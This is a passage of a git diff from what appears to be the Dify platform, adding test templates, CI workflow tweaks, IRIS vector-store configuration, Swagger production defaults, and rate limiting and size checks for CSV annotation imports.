// expect(screen.getByRole('button', { name: /test label/i })).toBeInTheDocument()
})
it('should support keyboard navigation', async () => {
// WHY: Some users can't use a mouse
// const user = userEvent.setup()
// render(<ComponentName />)
//
// await user.tab()
// expect(screen.getByRole('button')).toHaveFocus()
})
})
})

View File

@ -0,0 +1,207 @@
/**
* Test Template for Custom Hooks
*
* Instructions:
* 1. Replace `useHookName` with your hook name
* 2. Update import path
* 3. Add/remove test sections based on hook features
*/
import { renderHook, act, waitFor } from '@testing-library/react'
// import { useHookName } from './use-hook-name'
// ============================================================================
// Mocks
// ============================================================================
// API services (if hook fetches data)
// jest.mock('@/service/api')
// import * as api from '@/service/api'
// const mockedApi = api as jest.Mocked<typeof api>
// ============================================================================
// Test Helpers
// ============================================================================
// Wrapper for hooks that need context
// const createWrapper = (contextValue = {}) => {
// return ({ children }: { children: React.ReactNode }) => (
// <SomeContext.Provider value={contextValue}>
// {children}
// </SomeContext.Provider>
// )
// }
// ============================================================================
// Tests
// ============================================================================
describe('useHookName', () => {
beforeEach(() => {
jest.clearAllMocks()
})
// --------------------------------------------------------------------------
// Initial State
// --------------------------------------------------------------------------
describe('Initial State', () => {
it('should return initial state', () => {
// const { result } = renderHook(() => useHookName())
//
// expect(result.current.value).toBe(initialValue)
// expect(result.current.isLoading).toBe(false)
})
it('should accept initial value from props', () => {
// const { result } = renderHook(() => useHookName({ initialValue: 'custom' }))
//
// expect(result.current.value).toBe('custom')
})
})
// --------------------------------------------------------------------------
// State Updates
// --------------------------------------------------------------------------
describe('State Updates', () => {
it('should update value when setValue is called', () => {
// const { result } = renderHook(() => useHookName())
//
// act(() => {
// result.current.setValue('new value')
// })
//
// expect(result.current.value).toBe('new value')
})
it('should reset to initial value', () => {
// const { result } = renderHook(() => useHookName({ initialValue: 'initial' }))
//
// act(() => {
// result.current.setValue('changed')
// })
// expect(result.current.value).toBe('changed')
//
// act(() => {
// result.current.reset()
// })
// expect(result.current.value).toBe('initial')
})
})
// --------------------------------------------------------------------------
// Async Operations
// --------------------------------------------------------------------------
describe('Async Operations', () => {
it('should fetch data on mount', async () => {
// mockedApi.fetchData.mockResolvedValue({ data: 'test' })
//
// const { result } = renderHook(() => useHookName())
//
// // Initially loading
// expect(result.current.isLoading).toBe(true)
//
// // Wait for data
// await waitFor(() => {
// expect(result.current.isLoading).toBe(false)
// })
//
// expect(result.current.data).toEqual({ data: 'test' })
})
it('should handle fetch error', async () => {
// mockedApi.fetchData.mockRejectedValue(new Error('Network error'))
//
// const { result } = renderHook(() => useHookName())
//
// await waitFor(() => {
// expect(result.current.error).toBeTruthy()
// })
//
// expect(result.current.error?.message).toBe('Network error')
})
it('should refetch when dependency changes', async () => {
// mockedApi.fetchData.mockResolvedValue({ data: 'test' })
//
// const { result, rerender } = renderHook(
// ({ id }) => useHookName(id),
// { initialProps: { id: '1' } }
// )
//
// await waitFor(() => {
// expect(mockedApi.fetchData).toHaveBeenCalledWith('1')
// })
//
// rerender({ id: '2' })
//
// await waitFor(() => {
// expect(mockedApi.fetchData).toHaveBeenCalledWith('2')
// })
})
})
// --------------------------------------------------------------------------
// Side Effects
// --------------------------------------------------------------------------
describe('Side Effects', () => {
it('should call callback when value changes', () => {
// const callback = jest.fn()
// const { result } = renderHook(() => useHookName({ onChange: callback }))
//
// act(() => {
// result.current.setValue('new value')
// })
//
// expect(callback).toHaveBeenCalledWith('new value')
})
it('should cleanup on unmount', () => {
// const cleanup = jest.fn()
// jest.spyOn(window, 'addEventListener')
// jest.spyOn(window, 'removeEventListener')
//
// const { unmount } = renderHook(() => useHookName())
//
// expect(window.addEventListener).toHaveBeenCalled()
//
// unmount()
//
// expect(window.removeEventListener).toHaveBeenCalled()
})
})
// --------------------------------------------------------------------------
// Edge Cases
// --------------------------------------------------------------------------
describe('Edge Cases', () => {
it('should handle null input', () => {
// const { result } = renderHook(() => useHookName(null))
//
// expect(result.current.value).toBeNull()
})
it('should handle rapid updates', () => {
// const { result } = renderHook(() => useHookName())
//
// act(() => {
// result.current.setValue('1')
// result.current.setValue('2')
// result.current.setValue('3')
// })
//
// expect(result.current.value).toBe('3')
})
})
// --------------------------------------------------------------------------
// With Context (if hook uses context)
// --------------------------------------------------------------------------
describe('With Context', () => {
it('should use context value', () => {
// const wrapper = createWrapper({ someValue: 'context-value' })
// const { result } = renderHook(() => useHookName(), { wrapper })
//
// expect(result.current.contextValue).toBe('context-value')
})
})
})

View File

@ -0,0 +1,154 @@
/**
* Test Template for Utility Functions
*
* Instructions:
* 1. Replace `utilityFunction` with your function name
* 2. Update import path
* 3. Use test.each for data-driven tests
*/
// import { utilityFunction } from './utility'
// ============================================================================
// Tests
// ============================================================================
describe('utilityFunction', () => {
// --------------------------------------------------------------------------
// Basic Functionality
// --------------------------------------------------------------------------
describe('Basic Functionality', () => {
it('should return expected result for valid input', () => {
// expect(utilityFunction('input')).toBe('expected-output')
})
it('should handle multiple arguments', () => {
// expect(utilityFunction('a', 'b', 'c')).toBe('abc')
})
})
// --------------------------------------------------------------------------
// Data-Driven Tests
// --------------------------------------------------------------------------
describe('Input/Output Mapping', () => {
test.each([
// [input, expected]
['input1', 'output1'],
['input2', 'output2'],
['input3', 'output3'],
])('should return %s for input %s', (input, expected) => {
// expect(utilityFunction(input)).toBe(expected)
})
})
// --------------------------------------------------------------------------
// Edge Cases
// --------------------------------------------------------------------------
describe('Edge Cases', () => {
it('should handle empty string', () => {
// expect(utilityFunction('')).toBe('')
})
it('should handle null', () => {
// expect(utilityFunction(null)).toBe(null)
// or
// expect(() => utilityFunction(null)).toThrow()
})
it('should handle undefined', () => {
// expect(utilityFunction(undefined)).toBe(undefined)
// or
// expect(() => utilityFunction(undefined)).toThrow()
})
it('should handle empty array', () => {
// expect(utilityFunction([])).toEqual([])
})
it('should handle empty object', () => {
// expect(utilityFunction({})).toEqual({})
})
})
// --------------------------------------------------------------------------
// Boundary Conditions
// --------------------------------------------------------------------------
describe('Boundary Conditions', () => {
it('should handle minimum value', () => {
// expect(utilityFunction(0)).toBe(0)
})
it('should handle maximum value', () => {
// expect(utilityFunction(Number.MAX_SAFE_INTEGER)).toBe(...)
})
it('should handle negative numbers', () => {
// expect(utilityFunction(-1)).toBe(...)
})
})
// --------------------------------------------------------------------------
// Type Coercion (if applicable)
// --------------------------------------------------------------------------
describe('Type Handling', () => {
it('should handle numeric string', () => {
// expect(utilityFunction('123')).toBe(123)
})
it('should handle boolean', () => {
// expect(utilityFunction(true)).toBe(...)
})
})
// --------------------------------------------------------------------------
// Error Cases
// --------------------------------------------------------------------------
describe('Error Handling', () => {
it('should throw for invalid input', () => {
// expect(() => utilityFunction('invalid')).toThrow('Error message')
})
it('should throw with specific error type', () => {
// expect(() => utilityFunction('invalid')).toThrow(ValidationError)
})
})
// --------------------------------------------------------------------------
// Complex Objects (if applicable)
// --------------------------------------------------------------------------
describe('Object Handling', () => {
it('should preserve object structure', () => {
// const input = { a: 1, b: 2 }
// expect(utilityFunction(input)).toEqual({ a: 1, b: 2 })
})
it('should handle nested objects', () => {
// const input = { nested: { deep: 'value' } }
// expect(utilityFunction(input)).toEqual({ nested: { deep: 'transformed' } })
})
it('should not mutate input', () => {
// const input = { a: 1 }
// const inputCopy = { ...input }
// utilityFunction(input)
// expect(input).toEqual(inputCopy)
})
})
// --------------------------------------------------------------------------
// Array Handling (if applicable)
// --------------------------------------------------------------------------
describe('Array Handling', () => {
it('should process all elements', () => {
// expect(utilityFunction([1, 2, 3])).toEqual([2, 4, 6])
})
it('should handle single element array', () => {
// expect(utilityFunction([1])).toEqual([2])
})
it('should preserve order', () => {
// expect(utilityFunction(['c', 'a', 'b'])).toEqual(['c', 'a', 'b'])
})
})
})

5
.coveragerc Normal file
View File

@ -0,0 +1,5 @@
[run]
omit =
api/tests/*
api/migrations/*
api/core/rag/datasource/vdb/*

View File

@ -1,12 +0,0 @@
# Copilot Instructions
GitHub Copilot must follow the unified frontend testing requirements documented in `web/testing/testing.md`.
Key reminders:
- Generate tests using the mandated tech stack, naming, and code style (AAA pattern, `fireEvent`, descriptive test names, cleans up mocks).
- Cover rendering, prop combinations, and edge cases by default; extend coverage for hooks, routing, async flows, and domain-specific components when applicable.
- Target >95% line and branch coverage and 100% function/statement coverage.
- Apply the project's mocking conventions for i18n, toast notifications, and Next.js utilities.
Any suggestions from Copilot that conflict with `web/testing/testing.md` should be revised before acceptance.

View File

@ -71,18 +71,18 @@ jobs:
run: |
cp api/tests/integration_tests/.env.example api/tests/integration_tests/.env
- name: Run Workflow
run: uv run --project api bash dev/pytest/pytest_workflow.sh
- name: Run Tool
run: uv run --project api bash dev/pytest/pytest_tools.sh
- name: Run TestContainers
run: uv run --project api bash dev/pytest/pytest_testcontainers.sh
- name: Run Unit tests
- name: Run API Tests
env:
STORAGE_TYPE: opendal
OPENDAL_SCHEME: fs
OPENDAL_FS_ROOT: /tmp/dify-storage
run: |
uv run --project api bash dev/pytest/pytest_unit_tests.sh
uv run --project api pytest \
--timeout "${PYTEST_TIMEOUT:-180}" \
api/tests/integration_tests/workflow \
api/tests/integration_tests/tools \
api/tests/test_containers_integration_tests \
api/tests/unit_tests
- name: Coverage Summary
run: |
@ -94,4 +94,3 @@ jobs:
echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY
echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY
uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY

View File

@ -13,11 +13,12 @@ jobs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
# Use uv to ensure we have the same ruff version in CI and locally.
- uses: astral-sh/setup-uv@v6
- uses: actions/setup-python@v5
with:
python-version: "3.11"
- uses: astral-sh/setup-uv@v6
- run: |
cd api
uv sync --dev
@ -35,10 +36,11 @@ jobs:
- name: ast-grep
run: |
uvx --from ast-grep-cli sg --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all
uvx --from ast-grep-cli sg --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all
uvx --from ast-grep-cli sg -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all
uvx --from ast-grep-cli sg -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all
# ast-grep exits 1 if no matches are found; allow idempotent runs.
uvx --from ast-grep-cli ast-grep --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all || true
uvx --from ast-grep-cli ast-grep --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all || true
uvx --from ast-grep-cli ast-grep -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all || true
uvx --from ast-grep-cli ast-grep -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all || true
# Convert Optional[T] to T | None (ignoring quoted types)
cat > /tmp/optional-rule.yml << 'EOF'
id: convert-optional-to-union
@ -56,14 +58,15 @@ jobs:
pattern: $T
fix: $T | None
EOF
uvx --from ast-grep-cli sg scan --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all
uvx --from ast-grep-cli ast-grep scan . --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all
# Fix forward references that were incorrectly converted (Python doesn't support "Type" | None syntax)
find . -name "*.py" -type f -exec sed -i.bak -E 's/"([^"]+)" \| None/Optional["\1"]/g; s/'"'"'([^'"'"']+)'"'"' \| None/Optional['"'"'\1'"'"']/g' {} \;
find . -name "*.py.bak" -type f -delete
# mdformat breaks YAML front matter in markdown files. Add --exclude for directories containing YAML front matter.
- name: mdformat
run: |
uvx mdformat .
uvx --python 3.13 mdformat . --exclude ".claude/skills/**"
- name: Install pnpm
uses: pnpm/action-setup@v4
@ -84,7 +87,6 @@ jobs:
- name: oxlint
working-directory: ./web
run: |
pnpx oxlint --fix
run: pnpm exec oxlint --config .oxlintrc.json --fix .
- uses: autofix-ci/action@635ffb0c9798bd160680f18fd73371e355b85f27

1
.gitignore vendored
View File

@ -189,6 +189,7 @@ docker/volumes/matrixone/*
docker/volumes/mysql/*
docker/volumes/seekdb/*
!docker/volumes/oceanbase/init.d
docker/volumes/iris/*
docker/nginx/conf.d/default.conf
docker/nginx/ssl/*

1
.nvmrc Normal file
View File

@ -0,0 +1 @@
22.11.0

View File

@ -1,5 +0,0 @@
# Windsurf Testing Rules
- Use `web/testing/testing.md` as the single source of truth for frontend automated testing.
- Honor every requirement in that document when generating or accepting tests.
- When proposing or saving tests, re-read that document and follow every requirement.

View File

@ -626,7 +626,17 @@ QUEUE_MONITOR_ALERT_EMAILS=
QUEUE_MONITOR_INTERVAL=30
# Swagger UI configuration
SWAGGER_UI_ENABLED=true
# SECURITY: Swagger UI is automatically disabled in PRODUCTION environment (DEPLOY_ENV=PRODUCTION)
# to prevent API information disclosure.
#
# Behavior:
# - DEPLOY_ENV=PRODUCTION + SWAGGER_UI_ENABLED not set -> Swagger DISABLED (secure default)
# - DEPLOY_ENV=DEVELOPMENT/TESTING + SWAGGER_UI_ENABLED not set -> Swagger ENABLED
# - SWAGGER_UI_ENABLED=true -> Swagger ENABLED (overrides environment check)
# - SWAGGER_UI_ENABLED=false -> Swagger DISABLED (explicit disable)
#
# For development, you can uncomment below or set DEPLOY_ENV=DEVELOPMENT
# SWAGGER_UI_ENABLED=false
SWAGGER_UI_PATH=/swagger-ui.html
# Whether to encrypt dataset IDs when exporting DSL files (default: true)
@ -660,3 +670,14 @@ SINGLE_CHUNK_ATTACHMENT_LIMIT=10
ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2
ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60
IMAGE_FILE_BATCH_LIMIT=10
# Maximum allowed CSV file size for annotation import in megabytes
ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2
#Maximum number of annotation records allowed in a single import
ANNOTATION_IMPORT_MAX_RECORDS=10000
# Minimum number of annotation records required in a single import
ANNOTATION_IMPORT_MIN_RECORDS=1
ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5
ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20
# Maximum number of concurrent annotation import tasks per tenant
ANNOTATION_IMPORT_MAX_CONCURRENT=5

View File

@ -83,6 +83,7 @@ def initialize_extensions(app: DifyApp):
ext_redis,
ext_request_logging,
ext_sentry,
ext_session_factory,
ext_set_secretkey,
ext_storage,
ext_timezone,
@ -114,6 +115,7 @@ def initialize_extensions(app: DifyApp):
ext_commands,
ext_otel,
ext_request_logging,
ext_session_factory,
]
for ext in extensions:
short_name = ext.__name__.split(".")[-1]

View File

@ -380,6 +380,37 @@ class FileUploadConfig(BaseSettings):
default=60,
)
# Annotation Import Security Configurations
ANNOTATION_IMPORT_FILE_SIZE_LIMIT: NonNegativeInt = Field(
description="Maximum allowed CSV file size for annotation import in megabytes",
default=2,
)
ANNOTATION_IMPORT_MAX_RECORDS: PositiveInt = Field(
description="Maximum number of annotation records allowed in a single import",
default=10000,
)
ANNOTATION_IMPORT_MIN_RECORDS: PositiveInt = Field(
description="Minimum number of annotation records required in a single import",
default=1,
)
ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: PositiveInt = Field(
description="Maximum number of annotation import requests per minute per tenant",
default=5,
)
ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: PositiveInt = Field(
description="Maximum number of annotation import requests per hour per tenant",
default=20,
)
ANNOTATION_IMPORT_MAX_CONCURRENT: PositiveInt = Field(
description="Maximum number of concurrent annotation import tasks per tenant",
default=2,
)
inner_UPLOAD_FILE_EXTENSION_BLACKLIST: str = Field(
description=(
"Comma-separated list of file extensions that are blocked from upload. "
@ -1221,9 +1252,19 @@ class WorkflowLogConfig(BaseSettings):
class SwaggerUIConfig(BaseSettings):
SWAGGER_UI_ENABLED: bool = Field(
description="Whether to enable Swagger UI in api module",
default=True,
"""
Configuration for Swagger UI documentation.
Security Note: Swagger UI is automatically disabled in PRODUCTION environment
to prevent API information disclosure. Set SWAGGER_UI_ENABLED=true explicitly
to enable in production if needed.
"""
SWAGGER_UI_ENABLED: bool | None = Field(
description="Whether to enable Swagger UI in api module. "
"Automatically disabled in PRODUCTION environment for security. "
"Set to true explicitly to enable in production.",
default=None,
)
SWAGGER_UI_PATH: str = Field(
@ -1231,6 +1272,23 @@ class SwaggerUIConfig(BaseSettings):
default="/swagger-ui.html",
)
@property
def swagger_ui_enabled(self) -> bool:
"""
Compute whether Swagger UI should be enabled.
If SWAGGER_UI_ENABLED is explicitly set, use that value.
Otherwise, disable in PRODUCTION environment for security.
"""
if self.SWAGGER_UI_ENABLED is not None:
return self.SWAGGER_UI_ENABLED
# Auto-disable in production environment
import os
deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION")
return deploy_env.upper() != "PRODUCTION"
class TenantIsolatedTaskQueueConfig(BaseSettings):
TENANT_ISOLATED_TASK_CONCURRENCY: int = Field(

View File

@ -26,6 +26,7 @@ from .vdb.clickzetta_config import ClickzettaConfig
from .vdb.couchbase_config import CouchbaseConfig
from .vdb.elasticsearch_config import ElasticsearchConfig
from .vdb.huawei_cloud_config import HuaweiCloudConfig
from .vdb.iris_config import IrisVectorConfig
from .vdb.lindorm_config import LindormConfig
from .vdb.matrixone_config import MatrixoneConfig
from .vdb.milvus_config import MilvusConfig
@ -336,6 +337,7 @@ class MiddlewareConfig(
ChromaConfig,
ClickzettaConfig,
HuaweiCloudConfig,
IrisVectorConfig,
MilvusConfig,
AlibabaCloudMySQLConfig,
MyScaleConfig,

View File

@ -0,0 +1,91 @@
"""Configuration for InterSystems IRIS vector database."""
from pydantic import Field, PositiveInt, model_validator
from pydantic_settings import BaseSettings
class IrisVectorConfig(BaseSettings):
"""Configuration settings for IRIS vector database connection and pooling."""
IRIS_HOST: str | None = Field(
description="Hostname or IP address of the IRIS server.",
default="localhost",
)
IRIS_SUPER_SERVER_PORT: PositiveInt | None = Field(
description="Port number for IRIS connection.",
default=1972,
)
IRIS_USER: str | None = Field(
description="Username for IRIS authentication.",
default="_SYSTEM",
)
IRIS_PASSWORD: str | None = Field(
description="Password for IRIS authentication.",
default="Dify@1234",
)
IRIS_SCHEMA: str | None = Field(
description="Schema name for IRIS tables.",
default="dify",
)
IRIS_DATABASE: str | None = Field(
description="Database namespace for IRIS connection.",
default="USER",
)
IRIS_CONNECTION_URL: str | None = Field(
description="Full connection URL for IRIS (overrides individual fields if provided).",
default=None,
)
IRIS_MIN_CONNECTION: PositiveInt = Field(
description="Minimum number of connections in the pool.",
default=1,
)
IRIS_MAX_CONNECTION: PositiveInt = Field(
description="Maximum number of connections in the pool.",
default=3,
)
IRIS_TEXT_INDEX: bool = Field(
description="Enable full-text search index using %iFind.Index.Basic.",
default=True,
)
IRIS_TEXT_INDEX_LANGUAGE: str = Field(
description="Language for full-text search index (e.g., 'en', 'ja', 'zh', 'de').",
default="en",
)
@model_validator(mode="before")
@classmethod
def validate_config(cls, values: dict) -> dict:
"""Validate IRIS configuration values.
Args:
values: Configuration dictionary
Returns:
Validated configuration dictionary
Raises:
ValueError: If required fields are missing or pool settings are invalid
"""
# Only validate required fields if IRIS is being used as the vector store
# This allows the config to be loaded even when IRIS is not in use
# vector_store = os.environ.get("VECTOR_STORE", "")
# We rely on Pydantic defaults for required fields if they are missing from env.
# Strict existence check is removed to allow defaults to work.
min_conn = values.get("IRIS_MIN_CONNECTION", 1)
max_conn = values.get("IRIS_MAX_CONNECTION", 3)
if min_conn > max_conn:
raise ValueError("IRIS_MIN_CONNECTION must be less than or equal to IRIS_MAX_CONNECTION")
return values

View File

@ -20,6 +20,7 @@ language_timezone_mapping = {
"sl-SI": "Europe/Ljubljana",
"th-TH": "Asia/Bangkok",
"id-ID": "Asia/Jakarta",
"ar-TN": "Africa/Tunis",
}
languages = list(language_timezone_mapping.keys())

View File

@ -6,19 +6,20 @@ from flask import request
from flask_restx import Resource
from pydantic import BaseModel, Field, field_validator
from sqlalchemy import select
from sqlalchemy.orm import Session
from werkzeug.exceptions import NotFound, Unauthorized
P = ParamSpec("P")
R = TypeVar("R")
from configs import dify_config
from constants.languages import supported_language
from controllers.console import console_ns
from controllers.console.wraps import only_edition_cloud
from core.db.session_factory import session_factory
from extensions.ext_database import db
from libs.token import extract_access_token
from models.model import App, InstalledApp, RecommendedApp
P = ParamSpec("P")
R = TypeVar("R")
DEFAULT_REF_TEMPLATE_SWAGGER_2_0 = "#/definitions/{model}"
@ -90,7 +91,7 @@ class InsertExploreAppListApi(Resource):
privacy_policy = site.privacy_policy or payload.privacy_policy or ""
custom_disclaimer = site.custom_disclaimer or payload.custom_disclaimer or ""
with Session(db.engine) as session:
with session_factory.create_session() as session:
recommended_app = session.execute(
select(RecommendedApp).where(RecommendedApp.app_id == payload.app_id)
).scalar_one_or_none()
@ -138,7 +139,7 @@ class InsertExploreAppApi(Resource):
@only_edition_cloud
@admin_required
def delete(self, app_id):
with Session(db.engine) as session:
with session_factory.create_session() as session:
recommended_app = session.execute(
select(RecommendedApp).where(RecommendedApp.app_id == str(app_id))
).scalar_one_or_none()
@ -146,13 +147,13 @@ class InsertExploreAppApi(Resource):
if not recommended_app:
return {"result": "success"}, 204
with Session(db.engine) as session:
with session_factory.create_session() as session:
app = session.execute(select(App).where(App.id == recommended_app.app_id)).scalar_one_or_none()
if app:
app.is_public = False
with Session(db.engine) as session:
with session_factory.create_session() as session:
installed_apps = (
session.execute(
select(InstalledApp).where(

View File

@ -1,6 +1,6 @@
from typing import Any, Literal
from flask import request
from flask import abort, make_response, request
from flask_restx import Resource, fields, marshal, marshal_with
from pydantic import BaseModel, Field, field_validator
@ -8,6 +8,8 @@ from controllers.common.errors import NoFileUploadedError, TooManyFilesError
from controllers.console import console_ns
from controllers.console.wraps import (
account_initialization_required,
annotation_import_concurrency_limit,
annotation_import_rate_limit,
cloud_edition_billing_resource_check,
edit_permission_required,
setup_required,
@ -257,7 +259,7 @@ class AnnotationApi(Resource):
@console_ns.route("/apps/<uuid:app_id>/annotations/export")
class AnnotationExportApi(Resource):
@console_ns.doc("export_annotations")
@console_ns.doc(description="Export all annotations for an app")
@console_ns.doc(description="Export all annotations for an app with CSV injection protection")
@console_ns.doc(params={"app_id": "Application ID"})
@console_ns.response(
200,
@ -272,8 +274,14 @@ class AnnotationExportApi(Resource):
def get(self, app_id):
app_id = str(app_id)
annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id)
response = {"data": marshal(annotation_list, annotation_fields)}
return response, 200
response_data = {"data": marshal(annotation_list, annotation_fields)}
# Create response with secure headers for CSV export
response = make_response(response_data, 200)
response.headers["Content-Type"] = "application/json; charset=utf-8"
response.headers["X-Content-Type-Options"] = "nosniff"
return response
@console_ns.route("/apps/<uuid:app_id>/annotations/<uuid:annotation_id>")
@ -314,18 +322,25 @@ class AnnotationUpdateDeleteApi(Resource):
@console_ns.route("/apps/<uuid:app_id>/annotations/batch-import")
class AnnotationBatchImportApi(Resource):
@console_ns.doc("batch_import_annotations")
@console_ns.doc(description="Batch import annotations from CSV file")
@console_ns.doc(description="Batch import annotations from CSV file with rate limiting and security checks")
@console_ns.doc(params={"app_id": "Application ID"})
@console_ns.response(200, "Batch import started successfully")
@console_ns.response(403, "Insufficient permissions")
@console_ns.response(400, "No file uploaded or too many files")
@console_ns.response(413, "File too large")
@console_ns.response(429, "Too many requests or concurrent imports")
@setup_required
@login_required
@account_initialization_required
@cloud_edition_billing_resource_check("annotation")
@annotation_import_rate_limit
@annotation_import_concurrency_limit
@edit_permission_required
def post(self, app_id):
from configs import dify_config
app_id = str(app_id)
# check file
if "file" not in request.files:
raise NoFileUploadedError()
@ -335,9 +350,27 @@ class AnnotationBatchImportApi(Resource):
# get file from request
file = request.files["file"]
# check file type
if not file.filename or not file.filename.lower().endswith(".csv"):
raise ValueError("Invalid file type. Only CSV files are allowed")
# Check file size before processing
file.seek(0, 2) # Seek to end of file
file_size = file.tell()
file.seek(0) # Reset to beginning
max_size_bytes = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024
if file_size > max_size_bytes:
abort(
413,
f"File size exceeds maximum limit of {dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT}MB. "
f"Please reduce the file size and try again.",
)
if file_size == 0:
raise ValueError("The uploaded file is empty")
return AppAnnotationService.batch_import_app_annotations(app_id, file)

View File

@ -114,7 +114,7 @@ class AppTriggersApi(Resource):
@console_ns.route("/apps/<uuid:app_id>/trigger-enable")
class AppTriggerEnableApi(Resource):
@console_ns.expect(console_ns.models[ParserEnable.__name__], validate=True)
@console_ns.expect(console_ns.models[ParserEnable.__name__])
@setup_required
@login_required
@account_initialization_required

View File

@ -230,6 +230,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool
VectorType.CLICKZETTA,
VectorType.BAIDU,
VectorType.ALIBABACLOUD_MYSQL,
VectorType.IRIS,
}
semantic_methods = {"retrieval_method": [RetrievalMethod.SEMANTIC_SEARCH.value]}

View File

@ -26,7 +26,7 @@ console_ns.schema_model(Parser.__name__, Parser.model_json_schema(ref_template=D
@console_ns.route("/rag/pipelines/<uuid:pipeline_id>/workflows/published/datasource/nodes/<string:node_id>/preview")
class DataSourceContentPreviewApi(Resource):
@console_ns.expect(console_ns.models[Parser.__name__], validate=True)
@console_ns.expect(console_ns.models[Parser.__name__])
@setup_required
@login_required
@account_initialization_required

View File

@ -2,7 +2,7 @@ import logging
from typing import Any, Literal
from uuid import UUID
from pydantic import BaseModel, Field
from pydantic import BaseModel, Field, field_validator
from werkzeug.exceptions import InternalServerError, NotFound
import services
@ -52,10 +52,24 @@ class ChatMessagePayload(BaseModel):
inputs: dict[str, Any]
query: str
files: list[dict[str, Any]] | None = None
conversation_id: UUID | None = None
parent_message_id: UUID | None = None
conversation_id: str | None = None
parent_message_id: str | None = None
retriever_from: str = Field(default="explore_app")
@field_validator("conversation_id", "parent_message_id", mode="before")
@classmethod
def normalize_uuid(cls, value: str | UUID | None) -> str | None:
"""
Accept blank IDs and validate UUID format when provided.
"""
if not value:
return None
try:
return helper.uuid_value(value)
except ValueError as exc:
raise ValueError("must be a valid UUID") from exc
register_schema_models(console_ns, CompletionMessagePayload, ChatMessagePayload)

View File

@ -3,7 +3,7 @@ from uuid import UUID
from flask import request
from flask_restx import marshal_with
from pydantic import BaseModel, Field
from pydantic import BaseModel, Field, model_validator
from sqlalchemy.orm import Session
from werkzeug.exceptions import NotFound
@ -30,9 +30,16 @@ class ConversationListQuery(BaseModel):
class ConversationRenamePayload(BaseModel):
name: str
name: str | None = None
auto_generate: bool = False
@model_validator(mode="after")
def validate_name_requirement(self):
if not self.auto_generate:
if self.name is None or not self.name.strip():
raise ValueError("name is required when auto_generate is false")
return self
register_schema_models(console_ns, ConversationListQuery, ConversationRenamePayload)

View File

@ -282,9 +282,10 @@ class ModelProviderModelCredentialApi(Resource):
tenant_id=tenant_id, provider_name=provider
)
else:
model_type = args.model_type
# Normalize model_type to the origin value stored in DB (e.g., "text-generation" for LLM)
normalized_model_type = args.model_type.to_origin_model_type()
available_credentials = model_provider_service.provider_manager.get_provider_model_available_credentials(
tenant_id=tenant_id, provider_name=provider, model_type=model_type, model_name=args.model
tenant_id=tenant_id, provider_name=provider, model_type=normalized_model_type, model_name=args.model
)
return jsonable_encoder(

View File

@ -46,8 +46,8 @@ class PluginDebuggingKeyApi(Resource):
class ParserList(BaseModel):
page: int = Field(default=1)
page_size: int = Field(default=256)
page: int = Field(default=1, ge=1, description="Page number")
page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)")
reg(ParserList)
@ -106,8 +106,8 @@ class ParserPluginIdentifierQuery(BaseModel):
class ParserTasks(BaseModel):
page: int
page_size: int
page: int = Field(default=1, ge=1, description="Page number")
page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)")
class ParserMarketplaceUpgrade(BaseModel):

View File

@ -331,3 +331,91 @@ def is_admin_or_owner_required(f: Callable[P, R]):
return f(*args, **kwargs)
return decorated_function
def annotation_import_rate_limit(view: Callable[P, R]):
"""
Rate limiting decorator for annotation import operations.
Implements sliding window rate limiting with two tiers:
- Short-term: Configurable requests per minute (default: 5)
- Long-term: Configurable requests per hour (default: 20)
Uses Redis ZSET for distributed rate limiting across multiple instances.
"""
@wraps(view)
def decorated(*args: P.args, **kwargs: P.kwargs):
_, current_tenant_id = current_account_with_tenant()
current_time = int(time.time() * 1000)
# Check per-minute rate limit
minute_key = f"annotation_import_rate_limit:{current_tenant_id}:1min"
redis_client.zadd(minute_key, {current_time: current_time})
redis_client.zremrangebyscore(minute_key, 0, current_time - 60000)
minute_count = redis_client.zcard(minute_key)
redis_client.expire(minute_key, 120) # 2 minutes TTL
if minute_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE:
abort(
429,
f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE} "
f"requests per minute allowed. Please try again later.",
)
# Check per-hour rate limit
hour_key = f"annotation_import_rate_limit:{current_tenant_id}:1hour"
redis_client.zadd(hour_key, {current_time: current_time})
redis_client.zremrangebyscore(hour_key, 0, current_time - 3600000)
hour_count = redis_client.zcard(hour_key)
redis_client.expire(hour_key, 7200) # 2 hours TTL
if hour_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR:
abort(
429,
f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR} "
f"requests per hour allowed. Please try again later.",
)
